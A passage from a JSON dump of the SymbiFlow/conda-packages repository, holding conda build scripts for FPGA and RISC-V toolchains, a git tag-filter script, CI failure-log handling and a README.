$PREFIX/lib/node_modules/netlistsvg/bin/exportLayout.js $PREFIX/bin/netlistsvg-dumplayout\n" }, { "alpha_fraction": 0.6860795617103577, "alphanum_fraction": 0.7002840638160706, "avg_line_length": 21.70967674255371, "blob_id": "b0fa2ee595ffcd77b5073ffd83df9ada276cca13", "content_id": "8258bb60d6e6770c8bbe9696ba0de8edea7705c2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 704, "license_type": "permissive", "max_line_length": 70, "num_lines": 31, "path": "/.travis/after_failure.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $TRAVIS_BUILD_DIR/.travis/common.sh\n\n# Close the after_failure fold travis has created already.\ntravis_fold end after_failure\n\n$SPACER\n\nstart_section \"failure.tail\" \"${RED}Failure output...${NC}\"\necho \"Log is $(wc -l /tmp/output.log) lines long.\"\necho \"Displaying last 1000 lines\"\necho\ntail -n 1000 /tmp/output.log\nend_section \"failure.tail\"\n\n$SPACER\n\n#COUNT=0\n#for i in $(find $BASE_PATH -name config.log); do\n#\tstart_section \"failure.log.$COUNT\" \"${RED}Failure output $i...${NC}\"\n#\tcat $i\n#\tend_section \"failure.log.$COUNT\"\n#\tCOUNT=$((COUNT+1))\n#done\n#\n#$SPACER\n\nstart_section \"failure.log.full\" \"${RED}Failure output.log...${NC}\"\ncat /tmp/output.log\nend_section \"failure.log.full\"\n" }, { "alpha_fraction": 0.6609442234039307, "alphanum_fraction": 0.7038626670837402, "avg_line_length": 17.83783721923828, "blob_id": "28acef28b09067b8dc22c392c21d6d51681a38a4", "content_id": "b99469cb20b2e59a8e706a69e97fdccf0b9e458d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 699, "license_type": "permissive", "max_line_length": 117, "num_lines": 37, "path": "/README.md", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "# conda-hdmi2usb-packages\n\nConda build recipes for HDMI2USB-litex-firmware build dependencies.\n\nBasically, anything which hasn't gotten a proper package at https://launchpad.net/~timvideos/+archive/ubuntu/hdmi2usb\n\n# Toolchains\n\n## LiteX \"soft-CPU\" support\n\nThe LiteX system supports both a `lm32` and `or1k` \"soft-CPU\" implementations.\n\nCurrent versions are;\n\n * binutils - 2.28.0\n * gcc - 5.4.0\n * gcc+newlib - 5.4.0 + 2.4.0\n * gdb - 7.11\n\n### lm32-elf\n\n * All come from upstream.\n\n### or1k-elf\n\n * binutils - upstream\n * gcc, newlib & gdb - or1k forks based on upstream version.\n\n## Cypress FX2 support\n\n * sdcc (Current version: 3.5.0)\n\n# Support Tools\n\n## OpenOCD\n\nTool for JTAG programming.\n \n" }, { "alpha_fraction": 0.731249988079071, "alphanum_fraction": 0.731249988079071, "avg_line_length": 19, "blob_id": "0edc1f2d078927a1be02b56a2c3ba8320de21169", "content_id": "c573a137b593742fec60f1a7b135349eefe3c890", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 320, "license_type": "permissive", "max_line_length": 79, "num_lines": 16, "path": "/slang/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nexport CC=gcc-${USE_SYSTEM_GCC_VERSION}\nexport CXX=g++-${USE_SYSTEM_GCC_VERSION}\n\nmkdir build && cd build\n\ncmake .. -DSLANG_INCLUDE_TESTS=OFF -DCMAKE_BUILD_TYPE=Release -DSTATIC_BUILD=ON\n\nmake\n\ninstall -D bin/slang $PREFIX/bin/slang-driver\ninstall -D bin/rewriter $PREFIX/bin/slang-rewriter\n" }, { "alpha_fraction": 0.6529411673545837, "alphanum_fraction": 0.658823549747467, "avg_line_length": 11.071428298950195, "blob_id": "50dd0701d44c64ffbd57026270d1ae387c43f049", "content_id": "095544047b257386c629ae62d31933f77ed650c6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 170, "license_type": "permissive", "max_line_length": 41, "num_lines": 14, "path": "/prjxray-tools/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nmkdir build\ncd build\ncmake -DCMAKE_INSTALL_PREFIX=${PREFIX} ..\nmake -j$(nproc)\nmake install\n\n" }, { "alpha_fraction": 0.7039626836776733, "alphanum_fraction": 0.7179487347602844, "avg_line_length": 14.321428298950195, "blob_id": "4165aca8a811a5ea2b1f2bfc3684a69289e5fd8c", "content_id": "c5528d8dc028fac4745e98771f63dd56342d4302", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 429, "license_type": "permissive", "max_line_length": 47, "num_lines": 28, "path": "/symbiflow-yosys/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\n#unset CFLAGS\n#unset CXXFLAGS\n#unset CPPFLAGS\n#unset DEBUG_CXXFLAGS\n#unset DEBUG_CPPFLAGS\n#unset LDFLAGS\n\nwhich pkg-config\n\nmake config-conda-linux\necho \"PREFIX := $PREFIX\" >> Makefile.conf\n\nmake V=1 -j$CPU_COUNT\nmake test\nmake install\n\n$PREFIX/bin/yosys -V\n$PREFIX/bin/yosys-abc -v 2>&1 | grep compiled\n$PREFIX/bin/yosys -Q -S tests/simple/always01.v\n" }, { "alpha_fraction": 0.573236882686615, "alphanum_fraction": 0.5862568020820618, "avg_line_length": 30.067415237426758, "blob_id": "f70ac8e7bc639777757f253294f14658c9413b69", "content_id": "738ab2c2ac449576adbee33eaf65fd1d4dae3780", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2765, "license_type": "permissive", "max_line_length": 112, "num_lines": 89, "path": "/conda-tag-filter.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\n\nPACKAGE=${1:-PACKAGE}\n\nTAG_EXTRACT='[0-9]+[_.][0-9]+([_.][0-9])?([._\\-]rc[0-9]+)?([_\\-][0-9]+[_\\-]g[0-9a-fA-F]+)?$'\nTAG_PATTERN='^v[0-9]+\\.[0-9]+(\\.[0-9]+|\\.rc[0-9]+)*$'\n\nfor CONDA_GIT_URL in $(cat $PACKAGE/meta.yaml | grep \"git_url\" | sed -e's/.* //'); do\nCONDA_GIT_DIR=$CONDA_PATH/conda-bld/git_cache/$(echo \"$CONDA_GIT_URL\" | grep -o '://.*' | cut -f3- -d/)\nif [ ! -d $CONDA_GIT_DIR ]; then\n\tgit clone --bare \"$CONDA_GIT_URL\" $CONDA_GIT_DIR\nfi\n(\n\texport GIT_DIR=$CONDA_GIT_DIR\n\n\tCURRENT_HEAD=$(git rev-parse HEAD)\n\tLAST_HEAD=$(cat $GIT_DIR/TAG_FILTER 2> /dev/null || true)\n\tif [ g\"$LAST_HEAD\" != g\"$CURRENT_HEAD\" -o 1 -eq 1 ]; then\n\t\t# Disable automatic fetching of tags\n\t\tgit config remote.origin.tagOpt --no-tags\n\n\t\t# Remove all tags\n\t\tfor TAG in $(git tag --list); do\n\t\t\tgit tag -d $TAG > /dev/null\n\t\tdone\n\n\t\t# Manually fetch the tags\n\t\techo \"Fetching tags..\"\n\t\tgit fetch --tags\n\t\techo\n\n\t\techo \"Initial set of tags:\"\n\t\tgit tag --list | sort --version-sort | grep --color=always -e \"^\" -e $TAG_PATTERN | sed -e's/^/ * /'\n\t\techo\n\n\t\t# Rewrite non-standard tags\n\t\tfor TAG in $(git tag --list | sort --version-sort | grep -P \"$TAG_EXTRACT\"); do\n\t\t\tTAG_VALUE=v$(echo $TAG | grep -o -P \"$TAG_EXTRACT\" | sed -e's/[_\\-]g[0-9a-fA-F]\\+//' -e's/-/./g' -e's/_/./g')\n\t\t\tif [ \"$TAG\" = \"$TAG_VALUE\" ]; then\n\t\t\t\tcontinue\n\t\t\tfi\n\t\t\tTAG_HASH=\"$(git rev-parse $TAG^{})\"\n\t\t\tTAG_VALUE_HASH=\"$(git rev-parse $TAG_VALUE^{} 2> /dev/null || true)\"\n\t\t\tif [ \"$TAG_VALUE_HASH\" = \"$TAG_VALUE^{}\" ]; then\n\t\t\t\tgit tag -m\"From tag $TAG\" -a $TAG_VALUE $TAG_HASH\n\t\t\t\techo \"New extracted tag - $TAG -> $TAG_VALUE ($TAG_HASH)\"\n\t\t\telif [ \"$TAG_VALUE_HASH\" != \"$TAG_HASH\" ]; then\n\t\t\t\tgit tag -d $TAG_VALUE\n\t\t\t\tgit tag -m\"From tag $TAG\" -a $TAG_VALUE $TAG_HASH\n\t\t\t\techo \"Updated extracted tag - $TAG -> $TAG_VALUE ($TAG_HASH)\"\n\t\t\telse\n\t\t\t\techo \"Existing extracted tag - $TAG -> $TAG_VALUE ($TAG_HASH)\"\n\t\t\tfi\n\t\tdone\n\t\techo\n\n\t\tif [ -e $PACKAGE/extra.tags ]; then\n\t\t\tcat $PACKAGE/extra.tags | while read TAG TAG_HASH; do\n\t\t\t\tgit tag -m\"Extra tag\" -a $TAG $TAG_HASH\n\t\t\t\techo \"Extra tag added - $TAG ($TAG_HASH)\"\n\t\t\tdone\n\t\t\techo\n\t\tfi\n\n\t\t# Remove all the non-version tags\n\t\tfor TAG in $(git tag --list | sort --version-sort | grep -P -v \"$TAG_PATTERN\"); do\n\t\t\tgit tag -d $TAG\n\t\tdone\n\t\techo\n\n\t\t# Add a tag if it doesn't exist\n\t\tif [ $(git tag --list | wc -l) -eq 0 ]; then\n\t\t\tOLDEST_COMMIT=$(git log --reverse --pretty=%H | head -n1)\n\t\t\techo \"Adding v0.0 to $OLDEST_COMMIT (first commit in repository!)\"\n\t\t\tgit tag -a v0.0 $OLDEST_COMMIT -m\"v0.0\"\n\t\t\techo\n\t\tfi\n\t\tgit rev-parse HEAD > $GIT_DIR/TAG_FILTER\n\n\t\t# List the remaining tags\n\t\techo \"Remaining tags\"\n\t\tgit tag --list | sort --version-sort | sed -e's/^/ * /'\n\t\techo\n\tfi\n\techo \"Git describe output: '$(git describe --tags)'\"\n)\ndone\n" }, { "alpha_fraction": 0.6452991366386414, "alphanum_fraction": 0.6581196784973145, "avg_line_length": 12, "blob_id": "013f7d05d950e4fb1816363b8f921747e6031d4b", "content_id": "37c1e606fa94733298c6392b88f3821b763c85da", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 234, "license_type": "permissive", "max_line_length": 35, "num_lines": 18, "path": "/riscv32/binutils/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nmkdir build\ncd build\n../configure \\\n --target=riscv32-elf \\\n --prefix=$PREFIX \\\n --enable-deterministic-archives \\\n\nmake -j$CPU_COUNT\nmake install-strip\n" }, { "alpha_fraction": 0.5775700807571411, "alphanum_fraction": 0.5794392228126526, "avg_line_length": 16.83333396911621, "blob_id": "e445821601fca892dadee972113dee216b3fd5d2", "content_id": "961490551776be686d666ecbc4bc04ab4b340256", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 535, "license_type": "permissive", "max_line_length": 67, "num_lines": 30, "path": "/netlistsvg/run_test.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset +x\n\necho \"------------------------\"\n\necho $PWD\nwhich yosys\nwhich netlistsvg\n\necho \"------------------------\"\n\nNETLISTSVG=$(which netlistsvg)\nNETLISTSVG_SKIN=$PREFIX/lib/node_modules/netlistsvg/lib/default.svg\nNETLISTSVG_EXAMPLES=$PREFIX/lib/node_modules/netlistsvg/examples/*\ncp -aR $NETLISTSVG_EXAMPLES .\n\nsed -i -e's/\\( %\\.[^ ]*\\)png/\\1svg/g' Makefile\n\necho \"------------------------\"\n\nmake \\\n\tNETLISTSVG=$NETLISTSVG \\\n\tNETLISTSVG_SKIN=$NETLISTSVG_SKIN \\\n\tbuild.all\n\necho \"------------------------\"\n\nls *.svg\n" } ]
43
SreecharanG/Personal_Work
https://github.com/SreecharanG/Personal_Work
02a35ce511ac6aaf7cddb3c526cc05fc36c96169
a6c1a986984426a348660c85fbf37a6c4919cdb2
bb9d86b16b3ff02f20af92d08ae7905aa1b0c53c
refs/heads/master
2018-09-26T02:21:37.615050
2018-07-20T05:41:11
2018-07-20T05:41:11
120,911,488
0
0
null
2018-02-09T13:52:35
2018-07-18T06:41:06
2018-07-20T05:41:12
Python
[ { "alpha_fraction": 0.6740442514419556, "alphanum_fraction": 0.6780683994293213, "avg_line_length": 19.75, "blob_id": "7cdfca4a214fca54a388a0ecce8a3a3086a65153", "content_id": "261829cf42462466430935733600fdb3372cb36e", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "permissive", "max_line_length": 46, "num_lines": 24, "path": "/Part4/Copy_List_With_Random_Pointer.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class RandomListNode(object):\n\tdef __init__(self, x):\n\t\tself.label = x\n\t\tself.next = None\n\t\tself.random = None\n\nclass Solution(object):\n\tdef copyRandomList(self, head):\n\t\tif not head:\n\t\t\treturn None\n\n\t\tvisited = dict90\n\t\tnode = head\n\t\twhile node:\n\t\t\tvisited[node] = RandomListNode(node.label)\n\t\t\tnode = node.next\n\n\t\tvisited[None] = None\n\t\tnode = head\n\t\twhile node:\n\t\t\tvisited[node].next = visited[node.next]\n\t\t\tvisited[node].random = visited[node.random]\n\t\t\tnode = node.next\n\t\treturn visited[head]" }, { "alpha_fraction": 0.5449010729789734, "alphanum_fraction": 0.564687967300415, "avg_line_length": 23.296297073364258, "blob_id": "0e01ad2ae108dc3b3b3c93f74511d4a7581baaf2", "content_id": "4a5da2a3177edbf5926546754b678b058e75e400", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 65, "num_lines": 27, "path": "/Part1/Max_Points_on_a_Line.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Point(object):\n\tdef __init__(self, a=0, b=0):\n\t\tself.x = a\n\t\tself.y = b\n\nclass Solution(object):\n\tdef maxPoints(self, points):\n\t\tn = len(points)\n\t\tslope_map = {}\n\t\tresult = 0\n\t\tfor i in range(n):\n\t\t\tslope_map.clear()\n\t\t\tsame, vertical = 1, 0\n\t\t\tslope_max = 0\n\t\t\tfor j in range(i + 1, n):\n\t\t\t\tdx, dy = points[i].x - points[j].x, points[i].y - points[j].y\n\n\t\t\t\tif dx == dy == 0:\n\t\t\t\t\tsame += 1\n\t\t\t\telif dx == 0:\n\t\t\t\t\tvertical += 1\n\t\t\t\telse:\n\t\t\t\t\tslope = float(dy) / float(dx)\n\t\t\t\t\tslope_map[slope] = slope_map.get(slope, 0) + 1\n\t\t\t\t\tslope_max = max(slope_max, slope_map[slope])\n\t\t\tresult = max(result, max(slope_max, vertical) + same) \n\t\treturn result\n\t" }, { "alpha_fraction": 0.6320000290870667, "alphanum_fraction": 0.6320000290870667, "avg_line_length": 20.882352828979492, "blob_id": "1172802422dca99bb0b871fd4c089da9dac009cf", "content_id": "5bfcb2ea415ad9b7b312d098babdd9e4cf2236c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 43, "num_lines": 17, "path": "/Part2/Flatten_Binary_Tree_To_Linked_List.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef flatten(self, root):\n\t\tstack = []\n\t\twhile root:\n\t\t\tif root.left:\n\t\t\t\tif root.right:\n\t\t\t\t\tstack.append(root.right)\n\t\t\t\troot.right, root.left = root.left, None\n\t\t\tif not root.right and stack:\n\t\t\t\troot.right = stack.pop()\n\t\t\troot = root.right\n\t\t\t" }, { "alpha_fraction": 0.6014760136604309, "alphanum_fraction": 0.6420664191246033, "avg_line_length": 22.39130401611328, "blob_id": "66a2b33700dfdf2fd13a5c03564d34fef21a28b0", "content_id": "c1cc10d417a0ee012528ad1cdfe63f56d8facded", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 542, "license_type": "permissive", "max_line_length": 67, "num_lines": 23, "path": "/Part4/Divide_Two_Integers.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef divide(self, dividend, divisor):\n\t\tMAX_INT = 2147483647\n\t\tsign = 1\n\t\tif dividend >= 0 and divisor < 0 or dividend <=0 and divisor > 0:\n\t\t\tsign = -1\n\n\t\tdividend = abs(dividend)\n\t\tdivisor = abs(divisor)\n\n\t\tresult = 0\n\t\tcurrent = divisor\n\t\tcurrentResult = 1\n\t\twhile current <= dividend:\n\t\t\tcurrent <<= 1\n\t\t\tcurrentResult <<= 1\n\t\twhile divisor <= dividend:\n\t\t\tcurrent <<= 1\n\t\t\tcurrentResult <<= 1\n\t\t\tif current <= dividend:\n\t\t\t\tdividend -= current\n\t\t\t\tresult += currentResult\n\t\treturn min(sign * result, MAX_INT)\n\n\t\t\t" }, { "alpha_fraction": 0.6375404596328735, "alphanum_fraction": 0.6407766938209534, "avg_line_length": 16.657142639160156, "blob_id": "0d23414b60fdbb68da28ff472d1fdb54f3941e54", "content_id": "c4b14e21be3d76e3b4564f5b295fbbf382d053fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 618, "license_type": "no_license", "max_line_length": 36, "num_lines": 35, "path": "/Part3/Reverse_Nodes_In_K_Group.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tself.val = x\n\tself.next = None\n\nclass Solution(object):\n\tdef reverseKGroup(self, head, k):\n\t\tif not head or k <= 1:\n\t\t\treturn head\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\ttemp = dummy\n\t\twhile temp:\n\t\t\ttemp = self.reverseNextK(temp, k)\n\t\treturn dummy.next\n\n\tdef reverseNextK(self, head, k):\n\t\ttemp = head\n\t\tfor i in range(k):\n\t\t\tif not temp.next:\n\t\t\t\treturn None\n\t\t\ttemp = temp.next\n\n\t\tnode = head.next\n\t\tprev = head\n\t\tcurr = head.next\n\n\t\tfor i in range(k):\n\t\t\tnextNode = curr.next\n\t\t\tcurr.next = prev\n\t\t\tprev = curr\n\t\t\tcurr = nextNode\n\n\t\tnode.next = curr\n\t\thead.next = prev\n\t\treturn node\n" }, { "alpha_fraction": 0.6460905075073242, "alphanum_fraction": 0.654321014881134, "avg_line_length": 33.42856979370117, "blob_id": "e1bd8420b71a77e71d7acf74302d215e90d8ce5e", "content_id": "d8b0685e11f18c52395b47028aec1ff49181081a", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 243, "license_type": "permissive", "max_line_length": 93, "num_lines": 7, "path": "/Part4/Largest_Number.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "from functools import cmp_to_key\n\nclass Solution:\n\tdef largstNumber(sel, nums):\n\t\tsorted_nums = sorted(map(str, nums), key = cmp_to_key(lambda x, y:int(y + x) - int(x + y)))\n\t\tresult = \"\".join(sorted_nums).lstrip('0')\n\t\treturn result or '0'\n\t\t" }, { "alpha_fraction": 0.5248447060585022, "alphanum_fraction": 0.5465838313102722, "avg_line_length": 19.645160675048828, "blob_id": "8698bcea257926fdcd5db86682ff9bd4f68649ee", "content_id": "3b71afd1eaf4d27471a8b15a636fe9e72825c862", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 644, "license_type": "no_license", "max_line_length": 54, "num_lines": 31, "path": "/Part1/Spiral_Matrix_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef generateMatrix(self, n):\n\t\tleft = top = 0\n\t\tright = n - 1\n\t\tbottom = n - 1\n\t\tnum = 1\n\t\tresult = [[o for __ in range(n)] for __ in range(n)]\n\t\twhile left < right and top < bottom:\n\t\t\tfor i in range(left, right):\n\t\t\t\tresult[top][i] = num\n\t\t\t\tnum += 1\n\n\t\t\tfor i in range(top, bottom):\n\t\t\t\tresult[i][right] = num\n\t\t\t\tnum += 1\n\n\t\t\tfor i in range(right, left, -1):\n\t\t\t\tresult[bottom][i] = num\n\t\t\t\tnum += 1\n\n\t\t\tfor i in range(bottom, top, -1):\n\t\t\t\tresult[i][left] = num\n\t\t\t\tnum += 1\n\n\t\t\tleft += 1\n\t\t\tright -= 1\n\t\t\ttop += 1\n\t\t\tbottom -= 1\n\t\tif left == rightand top == bottom:\n\t\t\tresult[top][left] = num\n\t\treturn result\n\t\t\n\n" }, { "alpha_fraction": 0.4877651035785675, "alphanum_fraction": 0.5448613166809082, "avg_line_length": 16.02777862548828, "blob_id": "0b6e654f7fc58677b147c19e3389b6d5f086bb64", "content_id": "837a1715ae555c942320223ecf91131eccda3fa4", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "permissive", "max_line_length": 37, "num_lines": 36, "path": "/Part4/String_To_Integer.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef myAtoi(self, str):\n\t\tINT_MAX = 2147483647\n\t\tINT_MIN = -2147483647\n\n\t\tif not str:\n\t\t\treturn 0\n\t\tstr = str.strip()\n\t\tif not str:\n\t\t\treturn 0\n\t\tflag = 1\n\t\tif str[0] in ['+', '-']:\n\t\t\tif str[0] == '-':\n\t\t\t\tfalg = -1\n\t\t\tstr = str[1:]\n\n\n\t\tif not str or not str[0].isdigit():\n\t\t\treturn 0\n\n\t\tfor i, v in enumerate(str):\n\t\t\tif not v.isdigir():\n\t\t\t\tstr = str[:i]\n\t\t\t\tbreak\n\t\t\tresult = 0\n\t\t\tfor v in str[:]:\n\t\t\t\tresult += ord(v) - ord('0')\n\t\t\t\tresult *= 10\n\t\t\tresult ?= 10\n\t\t\tresult *= flag\n\n\t\t\tif result > INT_MAX:\n\t\t\t\treturn INT_MAX\n\t\t\tif result < INT_MIN:\n\t\t\t\treturn INT_MIN\n\t\t\treturn result\n" }, { "alpha_fraction": 0.6501901149749756, "alphanum_fraction": 0.6558935642242432, "avg_line_length": 19.920000076293945, "blob_id": "e797848e4de47c4ba624ddb4987afd51717f59a4", "content_id": "6829b7475f1ff7fcd45c120caff4d3b51ebc4ee6", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 526, "license_type": "permissive", "max_line_length": 38, "num_lines": 25, "path": "/Part4/Partition_List.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef partition(self, head, x):\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\tsmall_dummy = ListNode(-1)\n\t\tlarge_dummy = ListNode(-1)\n\n\n\t\tprev = dummysmall_prev = small_dummy\n\t\tlarge_prev = large_dummy\n\n\t\twhile prev.next:\n\t\t\tcurr = prev.next\n\t\t\tif curr.val < x:\n\t\t\t\tsmall_prev.next = curr\n\t\t\t\tsmall_prev = small_prev.next\n\n\t\t\telse:\n\t\t\t\tlarge_prev.next = curr\n\t\t\t\tlarge_prev = large_prev.next\n\t\t\tprev = prev.next\n\n\t\tlarge_prev.next = None\n\t\tsmall_prev.next = large_dummy.next\n\t\treturn small_dummy.next\n\n\t\t" }, { "alpha_fraction": 0.6437389850616455, "alphanum_fraction": 0.6455026268959045, "avg_line_length": 24.81818199157715, "blob_id": "048adc3dd91b4776f637d216237d00ea3f230eb9", "content_id": "c1affb92fbcf43ac49e3f6bc1ab1bcf42c2c47bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 60, "num_lines": 22, "path": "/Part3/Path_Sum_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\nclass Solution(object):\n\tdef pathSum(self, root, sum):\n\t\tresult = []\n\t\tself._pathSum(root, sum, [], result)\n\t\treturn result\n\n\tdef _pathSum(self, root, sum, curr, result):\n\t\tif not root:\n\t\t\treturn\n\t\tsum -= root.val\n\t\tif sum == 0 and root.left is None and root.right is None :\n\t\t\tresult.append(curr + [root.val])\n\n\t\tif root.left:\n\t\t\tself._pathSum(root.left, sum, curr + [root.val], result)\n\t\tif root.right:\n\t\t\tself._pathSum(root.right, sum, curr + [root.val], result)" }, { "alpha_fraction": 0.6585366129875183, "alphanum_fraction": 0.6747967600822449, "avg_line_length": 19.33333396911621, "blob_id": "6570cd9f8620151e7930f2a28ff4257dfce41d47", "content_id": "bb3d4ae762d1224f65a5e5a45533d4f8ac05c9a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "no_license", "max_line_length": 30, "num_lines": 6, "path": "/Part1/Single_Number.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tsef singleNumber(self, nums):\n\tresult = nums[0]\n\tfor i in nums[1:]:\n\t\tresult ^= i\n\treturn result\n\t" }, { "alpha_fraction": 0.6401098966598511, "alphanum_fraction": 0.6401098966598511, "avg_line_length": 19.11111068725586, "blob_id": "6f881cddb52ff91164db136644dcf1b98f197524", "content_id": "9f303527ff421921b6c54b2000d8829c590fe44a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 35, "num_lines": 18, "path": "/Part2/Binary_Tree_Preorder_Traversal.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef preorderTraversal(self, root):\n\t\tstack = []\n\t\tresult = []\n\t\twhile root or stack:\n\t\t\tif not root:\n\t\t\t\troot = stack.pop()\n\t\t\tresult.append(root.val)\n\t\t\tif root.right:\n\t\t\t\tstack.append(root.right)\n\t\t\troot = root.left\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5459272265434265, "alphanum_fraction": 0.580589234828949, "avg_line_length": 27.600000381469727, "blob_id": "a893acf177755b73e25f749f4c27a9fbce962a68", "content_id": "fad69322341c9df28d655a46ff7c93edadf73787", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "permissive", "max_line_length": 68, "num_lines": 20, "path": "/Part4/Restore_IP_Address.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef restoreIpAddress(self, s):\n\t\tresult = []\n\t\tself._restoreIpAddress(0, s, [], result)\n\t\treturn result\n\n\tdef _restoreIpAddress(self, length, s, ips, result):\n\t\tif not s:\n\t\t\tif length == 4:\n\t\t\t\tresult.append('.'.join(ips))\n\t\t\treturn\n\t\telif length == 4:\n\t\t\treturn\n\t\tself._restoreIpAddress(length + 1, s[1:], ips + [s[:1]], result)\n\n\t\tif s[0] != '0':\n\t\t\tif len(s) >= 2:\n\t\t\t\tself._restoreIpAddress(length + 1, s[2:], ips + [s[:2]], result)\n\t\t\tif len(s) >= 3 and int(s[:3]) <= 255:\n\t\t\t\tself._restoreIpAddress(length + 1, s[3:], ips + [s[:3]], result)\n\t\t\t\t\n" }, { "alpha_fraction": 0.5757575631141663, "alphanum_fraction": 0.5946969985961914, "avg_line_length": 19.384614944458008, "blob_id": "b2be7cc09afd4ef81db54ad2f365c2955b0fcd7a", "content_id": "81e2fa1a626025d49a09179f24f36f15c8b5a4c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 264, "license_type": "no_license", "max_line_length": 29, "num_lines": 13, "path": "/Part2/Maximum_Subarray.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef maxSubArray(self, nums):\n\t\tif not nums:\n\t\t\treturn 0\n\t\t\tlength = len(nums)\n\t\t\tcurrent = nums[0]\n\t\t\tm = current\n\t\t\tfor i in range(1, length):\n\t\t\t\tif current < 0:\n\t\t\t\t\tcurrent = 0\n\t\t\t\tcurrent += nums[i]\n\t\t\t\tm = max(current, m)\n\t\t\treturn m" }, { "alpha_fraction": 0.5045592784881592, "alphanum_fraction": 0.5227963328361511, "avg_line_length": 22.35714340209961, "blob_id": "711cbe479b3764d46212dc39c2f6c855b3058b51", "content_id": "7faa9de238d328aa23b09cb40003b439e8637b23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 43, "num_lines": 14, "path": "/Part2/Search_A_2D_Matrix.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef searchMatrix(self, matrix, target):\n\t\tm = 